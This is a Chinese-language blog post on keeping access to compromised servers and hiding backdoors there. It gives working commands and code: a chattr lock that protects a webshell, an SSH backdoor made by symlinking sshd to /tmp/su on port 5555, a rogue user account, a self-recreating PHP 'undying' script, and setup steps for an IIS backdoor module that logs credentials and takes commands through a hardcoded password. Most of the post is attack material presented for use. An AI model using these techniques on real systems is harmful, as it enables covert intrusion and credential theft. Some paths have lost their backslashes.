权限维持 – 后门隐藏技术

文件上锁

chattr +i webshell.php
lsattr webshell.php
chattr -i webshell.php
权限维持 - 后门隐藏技术

ssh 软链接

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
useradd test -p test
权限维持 - 后门隐藏技术
权限维持 - 后门隐藏技术
权限维持 - 后门隐藏技术

不死马

访问该 php 文件,会生成一个木马文件用于连接

<?php
  ignore_user_abort(); 
  set_time_limit(0);
  $interval = 5; 
do {
  $filename = 'test.php';
  if(file_exists($filename)) {
    echo "xxx";
  }
  else {
    $file = fopen("test.php", "w");
    $txt = "<?php phpinfo();?>n";
  fwrite($file, $txt);
  fclose($file);
  }
  sleep($interval);
} while (true);
?>
权限维持 - 后门隐藏技术

iis 后门

https://github.com/ygwlgGiao/iis-raid-backdoor

使用 vs2019 进行编译,functions.h 可修改配置信息

functions.h
#define COM_HEADER "X-Chrome-Variations"  传输指令和接收数据的头部字段
#define PASS_FILE "C:\Windows\Temp\creds.db"  保存到web请求服务端的位置
#define PASSWORD "SIMPLEPASS"  传输密码
权限维持 - 后门隐藏技术

生成后把 IIS-Backdoor.dll 放到 c 盘目录下,放置其他目录下面语句要进行适当的更改

C:Windowssystem32inetsrvAPPCMD.EXE install module /name:iisModule  /image:"c:IIS-Backdoor.dll" /add:true
python iis_controller.py --url http://x.x.x.x --password SIMPLEPASS
权限维持 - 后门隐藏技术

查看 iis 管理器模块,可发现新增的内容

权限维持 - 后门隐藏技术
权限维持 - 后门隐藏技术
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容